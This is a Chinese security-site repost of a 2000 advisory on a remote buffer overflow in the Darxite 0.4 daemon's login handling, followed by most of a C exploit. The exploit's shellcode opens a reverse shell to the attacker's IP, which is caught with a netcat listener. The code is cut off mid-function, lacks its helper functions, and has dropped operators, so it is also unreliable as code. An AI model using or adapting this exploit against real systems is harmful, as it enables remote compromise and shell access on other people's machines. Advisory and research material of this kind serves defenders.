Darxite 0.4 登录程序存在缓冲区溢出漏洞

发布日期：2000-08-23
更新日期：2000-08-23

受影响系统：

Ashley Montanaro Darxite 0.4
- Linux 2.x

描述：

---

Darxite 守护程序用来通过FTP或者HTTP来下载文件或执行FTP命令。
它在用户登录处理时没有正确检查用户输入的数据，如果用户提供一个很长的用户名或者
口令，将导致发生远程缓冲区溢出。攻击者可以远程获取Darxite 守护程序的运行权限。

有问题的代码部分在Library/sockets.c中：

char buffer[256];
..
sprintf(buffer, "%s\n", name);
..
sprintf(buffer, "%s\n, password);

<*来源： dethy (dethy@synnergy.net）
Scrippie （Scrippie/ronald@grafix.nl)
http://www.synnergy.net
*>





测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
Darxite Daemon v0.4 password authentication overflow
----------------------------------------------------

I tried to use some easy functions for string creation, and they seem to
work pretty quick (no more hours of frustration writing for loops :).

As always I used my own shellcode, you should do a "nc -l -p 27002" on the
machine you fill in as "your IP" and execute this - if it works you'll have
a shell in the netcat session.


-- Scrippie/ronald@grafix.nl
*/

/* Synnergy.net 2000 (c) */

#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <string.h>

#define DARX_BUF 1024
#define NUM_NOPS 1000

int xconnect(unsigned long, unsigned int);
void readBanner(int socket);
char *strcreat(char *, char *, int);
char *stralign(char *, int);
char *longToChar(unsigned long);

char hellcode[]=
"\xeb\x7a\x5e\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x8d\x4e"
"\x1c\xb2\x01\x89\x56\x20\xb2\x06\x89\x56\x24\xb2\x02\x89\x56"
"\x1c\xcd\x80\x89\x46\x18\x89\x16\x66\xc7\x46\x02\x69\x7a\x89"
"\x46\x1c\x8d\x06\x89\x46\x20\x80\xc2\x0e\x89\x56\x24\x31\xc0"
"\x04\x66\x80\xc3\x02\x8d\x4e\x1c\xcd\x80\x31\xc0\x04\x3f\x89"
"\xc2\x8b\x5e\x18\x31\xc9\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0"
"\x41\xcd\x80\x31\xc0\x8d\x7e\x0f\x80\xc1\x07\xf3\xaa\x04\x0b"
"\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x31\xd2\xcd\x80\x31\xc0"
"\xfe\xc0\xcd\x80\xe8\x81\xff\xff\xff\x41\x41\x42\x42\xBB\xBB"
"\xBB\xBB\x2f\x62\x69\x6e\x2f\x73\x68";

int main(int argc, char **argv)
{
int sd;
unsigned int align=0;
unsigned long sip, retaddy=0xbffff928;
char *iploc, *evilstring;

if(argc < 4) {
printf("Use as: %s <target IP> <target port> <your ip> [ret addy]
[align]
\n", argv[0]);
exit(0);
}

if((sip = inet_addr(argv[3])) == -1) {
perror("inet_addr()");
exit(-1);
}

if(argc > 4) retaddy = strtoul(argv[4], NULL, 16);
if(argc > 5) align = atoi(argv[5]);

printf("Using return address: 0x%lx\n", retaddy);
printf("Using alignment: %d\n", align);

/* Locate the IP position in the shellcode */
iploc=(char *)strchr(hellcode, 0xBB);
memcpy((void *) iploc, (void *) &sip, 4);

/* Generate the overflow string */

evilstring = strcreat(NULL, "A", align);
/* We memory leak 5 bytes here, don't make a service out of this :) */
evilstring = strcreat(evilstring, longToChar(retaddy), (DARX_BUF 8)>>2);
evilstring = strcreat(evilstring, "\x90", NUM_NOPS);
evilstring = strcreat(evilstring, hellcode, 1);

sd = xconnect(inet_addr(argv[1]), atoi(argv[2]));

printf("Connected... Now sending overflow...\n");

send(sd, evilstring, strlen(evilstring) 1, 0);

free(evilstring);
return(0);
}

/*
Returns the socket descriptor to "ip" on "port"
*/

int xconnect(unsigned long ip, unsigned int port)
{
struct sockaddr_in sa; /* Sockaddr */
int sd; /* Socket Descriptor */

if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}

memset(&sa, 0x00, sizeof(struct sockaddr_in));
sa.sin_port=htons(port);

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有